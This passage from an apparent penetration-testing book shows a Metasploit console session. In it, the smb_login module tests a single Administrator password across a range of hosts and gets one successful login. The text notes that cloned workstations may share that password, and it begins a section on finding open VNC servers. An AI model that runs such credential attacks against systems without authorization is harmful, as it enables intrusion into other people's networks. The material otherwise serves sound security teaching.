background image

52

Chapter 4

msf > 

use auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > 

show options

Module options:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASS_FILE                       no        File containing passwords, one per line
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       Set the SMB service port
   SMBDomain      WORKGROUP        no        SMB Domain
   SMBPass        password         no        SMB Password
   SMBUser        Administrator    no        SMB Username
   THREADS        50               yes       The number of concurrent threads
   USERPASS_FILE                   no        File containing users and passwords separated

by space, one pair per line

   USER_FILE                       no        File containing usernames, one per line

msf auxiliary(smb_login) > 

set RHOSTS 192.168.1.150-155

RHOSTS => 192.168.1.170-192.168.1.175
msf auxiliary(smb_login) > 

set SMBUser Administrator

SMBUser => Administrator
msf auxiliary(smb_login) > 

set SMBPass s3cr3t

SMBPass => s3cr3t
msf auxiliary(smb_login) > 

run

[*] Starting host 192.168.1.154
[*] Starting host 192.168.1.150
[*] Starting host 192.168.1.152
[*] Starting host 192.168.1.151
[*] Starting host 192.168.1.153
[*] Starting host 192.168.1.155

 [+] 192.168.1.155 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'

[*] Scanned 4 of 6 hosts (066% complete)
[*] Scanned 5 of 6 hosts (083% complete)
[*] Scanned 6 of 6 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >

You can see a successful login with user 

Administrator

 and a password of 

s3cr3t

 at  . Because workstations are all cloned from one image and deployed 

through the enterprise in many corporate environments, the administrator 
password may well be the same on all of them, granting you access to every 
workstation on the network.

Scanning for Open VNC Authentication

Virtual network computing (VNC) provides graphical access to remote sys-
tems in a way that’s similar to Microsoft’s Remote Desktop. VNC installations 
are common throughout corporations, because they provide a GUI-based 
view of server and workstation desktops. VNC is frequently installed to meet a 
temporary need and then completely forgotten and left unpatched, creating